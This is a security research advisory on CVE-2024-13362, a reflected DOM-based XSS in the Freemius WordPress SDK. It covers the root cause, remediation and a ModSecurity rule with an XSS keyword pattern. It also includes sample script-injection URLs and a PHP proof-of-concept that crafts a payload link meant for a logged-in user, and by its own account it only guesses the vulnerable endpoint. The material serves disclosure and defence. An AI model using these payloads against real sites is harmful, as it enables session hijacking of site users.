Atomic Edge analysis of CVE-2024-13362 (metadata-based): A reflected DOM-based cross-site scripting (XSS) vulnerability exists in the Freemius plugin SDK (versions <= 2.10.1) used by multiple WordPress plugins and themes, including the 'add-fields-to-checkout-page-woocommerce' plugin (version 1.3.4). The vulnerability allows unauthenticated attackers to inject arbitrary web scripts via the 'url' parameter. The CVSS score is 6.1 (Medium), with a vector of AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N.
Root Cause: The vulnerability stems from improper neutralization of user-supplied input in the 'url' parameter during web page generation (CWE-79). The description indicates insufficient input sanitization and output escaping. Since no source code diff is available, Atomic Edge analysis infers that the Freemius SDK likely processes the 'url' parameter in a JavaScript context without properly escaping HTML entities or encoding special characters. This allows an attacker to break out of an existing JavaScript string or DOM attribute and inject malicious script tags or event handlers. The DOM-based classification suggests the payload executes in the browser's DOM environment rather than server-side HTML.
Exploitation: An unauthenticated attacker crafts a malicious URL containing a JavaScript payload in the 'url' parameter. The attacker then tricks a victim user (e.g., via phishing) into clicking the link. When the target page loads, the SDK's JavaScript code reads the 'url' parameter from the query string and writes it into the DOM without sanitization. For example, a URL like `http://target.com/?url=javascript:alert(1)` or `http://target.com/?url=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E` would cause the injected script to execute in the victim's browser. The specific endpoint is likely part of the Freemius SDK's frontend script that handles redirect URLs or authentication callbacks. No authentication is required, as the parameter is processed client-side.
Remediation: The plugin developer must sanitize the 'url' parameter server-side before passing it to JavaScript, or properly escape the value when inserting it into the DOM. Atomic Edge research recommends using `sanitize_url()` in PHP to validate the URL scheme and domain, and applying context-specific escaping functions such as `esc_url()` or `esc_js()` when outputting the value in JavaScript. Additionally, the JavaScript code should use `encodeURI()` or `DOMPurify` to sanitize dynamic content before DOM insertion. Patched versions were not available at the time of analysis; users should update to a patched version when released or disable the plugin/theme if no patch is forthcoming.
Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the victim's browser session. This can lead to session hijacking, credential theft, defacement, or redirection to malicious sites. Since the XSS is reflected and requires user interaction (clicking a link), the impact is limited but still significant for targeted attacks against site administrators or users with elevated privileges. The attacker cannot directly access server-side data or execute code on the server.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Block reflected XSS via 'url' parameter in Freemius SDK frontend scripts
# This rule targets the vulnerable parameter where unsanitized input is used.
SecRule REQUEST_URI "@rx /wp-content/plugins/[^/]+/freemius/"
"id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Freemius reflected XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362',tag:'wordpress',tag:'xss'"
SecRule ARGS:url "@rx (?i:<script|<img|<svg|onerror|onload|onclick|javascript:|alert|prompt|confirm)"
"t:urlDecode,t:removeNulls,t:lowercase"
# If the exact Freemius endpoint is not known, a broader rule can match any request with a suspicious 'url' parameter.
# However, to avoid false positives, we restrict to paths containing 'freemius'.
# This blocks common XSS keywords in the parameter.
# Note: For non-AJAX frontend pages, we cannot rely on action parameters.
# The rule assumes the attack targets files within the vendor/freemius directory.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter
// Target WordPress site URL (modify as needed)
$target_url = 'http://example.com';
// The vulnerable parameter is 'url'. The exact endpoint depends on the Freemius SDK usage.
// Based on the CVE description, the vulnerability manifests in the frontend through the 'url' parameter.
// Below are two likely endpoints. Adjust based on actual plugin behavior.
// Common Freemius frontend script hook (used for connect messages, redirects, etc.)
$endpoint = '/wp-content/plugins/add-fields-to-checkout-page-woocommerce/freemius/assets/js/nojquery.ba-postmessage.min.js';
// Alternatively, the vulnerability may trigger via any page that includes the Freemius SDK JS.
// We will test with a generic page and append the malicious 'url' parameter.
// Malicious payload: inject script via double quote and >
$payload = '"><script>alert("XSS")</script>';
$full_url = $target_url . $endpoint . '?url=' . urlencode($payload);
echo "[+] Atomic Edge PoC for CVE-2024-13362n";
echo "[+] Target URL: " . $full_url . "n";
echo "[+] Send this URL to a logged-in WordPress user and observe the XSS alert.nn";
// Validate response to check for payload reflection
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $full_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code === 200 && strpos($response, '<script>alert("XSS")</script>') !== false) {
echo "[+] The reflected payload was found in the response, indicating the parameter is vulnerable.n";
} else {
echo "[!] The payload was not directly reflected. The vulnerability may be DOM-based and executed client-side.n";
echo "[!] The script executes only when the victim's browser processes the affected JavaScript code.n";
}
